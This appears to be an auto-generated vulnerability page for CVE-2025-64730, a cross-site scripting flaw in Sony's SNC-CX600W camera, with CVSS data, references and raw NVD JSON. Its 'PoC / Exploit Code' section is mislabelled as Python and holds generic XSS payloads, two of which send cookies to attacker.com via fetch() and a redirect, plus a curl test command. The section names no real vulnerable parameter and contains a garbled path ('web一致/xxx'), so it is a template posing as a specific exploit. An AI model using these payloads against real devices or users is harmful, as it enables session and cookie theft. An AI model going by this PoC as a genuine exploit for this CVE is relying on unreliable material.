CVE-2025-64730

Description

Cross-site scripting vulnerability exists in SNC-CX600W all versions. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the product.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:sony:snc-cx600w_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:sony:snc-cx600w:-:*:*:*:*:*:*:* - NOT VULNERABLE

Sony SNC-CX600W 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-64730 XSS PoC for Sony SNC-CX600W -->
<!-- This PoC demonstrates a reflected XSS attack -->

<!-- Method 1: URL-based XSS injection -->
<script>alert(document.cookie)</script>

<!-- Method 2: Encoded XSS payload -->
<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">

<!-- Method 3: DOM-based XSS -->
'><script>document.location='http://attacker.com/phish?data='+document.cookie</script>

<!-- Real attack scenario: -->
<!-- Attacker crafts a malicious URL like: -->
<!-- http://<camera-ip>/web一致/xxx?param=<script>malicious_code</script> -->
<!-- Then tricks authenticated user into clicking the link -->

<!-- Recommended test commands: -->
<!-- curl 'http://<target-ip>/path?param=<script>alert(1)</script>' -->
<!-- Check if script executes in browser context -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64730
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64730
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64730/
[4] VulDB https://vuldb.com/cve/CVE-2025-64730
[5] https://jvn.jp/en/jp/JVN75140384/
[6] https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64730", "sourceIdentifier": "[email protected]", "published": "2025-11-25T05:16:12.560", "lastModified": "2025-12-01T15:27:22.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting vulnerability exists in SNC-CX600W all versions. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the product."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.2, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sony:snc-cx600w_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "52A27136-5226-4C49-96C2-E49E8DC86BC6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sony:snc-cx600w:-:*:*:*:*:*:*:*", "matchCriteriaId": "D07C1884-C881-4A23-B345-5A588072C965"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN75140384/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sony.com/electronics/support/ip-cameras-fixed/snc-cx600w", "source": "[email protected]", "tags": ["Product"]}]}}